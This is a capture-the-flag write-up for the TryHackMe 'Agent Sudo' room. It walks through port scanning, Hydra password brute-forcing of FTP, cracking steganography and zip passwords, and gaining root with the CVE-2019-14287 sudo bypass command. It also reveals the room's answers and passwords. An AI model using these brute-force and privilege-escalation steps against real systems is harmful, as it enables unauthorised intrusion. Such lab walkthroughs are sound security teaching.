Agentd Sudo — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my AgentdSudo-Tryhackme writeup. Check it out!
TASK 2
First, let’s check nmap for opened ports on this device.
nmap -Pn -T5 -vv <ip>
There are 3 opening ports. So:
#1 3 is ans for question 1
An Apache web server is active under this device. So let’s access its webpage.
So we need the right user-agent to access the web. Look at the Hint, we know that the right user agent is “C”.
#2 user-agent is ans for question 2
Let’s change the user agent by any method you want. I will use the dev tool to do it. After changing the user-agent to “C”, now we can read the content.
So, we know this user’s name is Chris, and also one more important information: week passwd!
#3 chris is ans for question 3
TASK 3
Now we know the user name, let’s crack his password using Hydra.
hydra -l chris -P /your-wordlist-path ftp://<ip>
Now we know the password is: ******
Enter that password to question #1
Now let’s ftp to the machine.
Successful! Let’s try some cmd to list file. Error! So we need to enter passive mode.
type passive and enter
Here we go! We see there are 3 files within that directory. Let’s cat content of the txt file.
get To_agentJ.txt -
- specify the “-” at the end will help us to cat the file directly, no need to download to our machine.
So now we know that the password for agent J is stored inside 1 of these 2 photos.
Let’s download all 2 photos to our machine.
get cute-alient.jpg cutie.png
Let’s find it’s metadata. I will use Jeffrey Friedl’s image exif.
Nothing useful. So let’s try steghide to extract hidden data inside this photo.
steghide — extract -sf /path-to-cutie.png
Note that steghide cannot be used with .png format image, so let’s try the cutie-alien.jpg.
First of all, we need to crack the steghide password of this image. I’m using stegcracker. You can download it here: https://github.com/Paradoxis/StegCracker
stegcracker /path-to-cute-alien.jpg
By default, it will use the rockyou.txt wordlist, or you can choose your own wordlist by specify -w flag.
Cracked successfully! So the steg password is “area51” and you can see the secret content at /path-to-alient.jpg.out
#3 area51 is ans for question 3
Let’s see the secret message.
cat /path-to-cute-alien.jpg.out
So, now we know the agent J is “james” and his password is “hackerrules”
#4 james is ans for question 4
#5 hackerrules! is ans for question 5
However, there is also a “zip” password question left! So i think it’s hidden in the cutie.png. Let’s find out by binwalk.
binwalk /path-to-cutie.png -e
Here we go! There is a 8702.zip in this image. Let’s crack this zip’s password using john.
zip2john /path-to-8702.zip > output.txt
john — wordlist=/path-to-wordlist output.txt
After john has cracked the password, type:
john — show output.txt
So the password is “alien”.
#2 alien is ans for question 2
Now ssh to the machine!
TASK 4
sshpass -p hackerrules! ssh james@<ip>
#1 Here we got the flag for question 1
Now let’s copy the photo to our machine using scp. In your machine terminal (not the ssh terminal), type:
scp james@<ip>:/home/james/Alien_autospy.jpg /destination-path
Here we got the image. Let’s find some information about this image using reverse image search. The hint says “Foxnews”, so let’s find anything related to Foxnews with this image.
Finally we found the answer.
#2 Roswell alien autopsy is the ans for question 2
TASK 5
Let’s find a way to get root!
First, try sudo -l so see what command can James run as root.
Unfortunately, we cannot run any commands as root on this machine. So let’s try another way: find version of sudo and search for exploit
sudo -V
Sudo is running as version 1.8.21p2. Search for this version’s exploit and we’re leaded to a CVE.
https://www.cybersecurity-help.cz/vdb/SB2019101501
#1 CVE-2019–14287 is ans for question 1
Now run the exact command to get root!
sudo -u#-1 bash -u
Now, I’m root! cat root.txt to see the flag.
Now we see the root flag and also the Agent R’s real name: DesKel
The end.
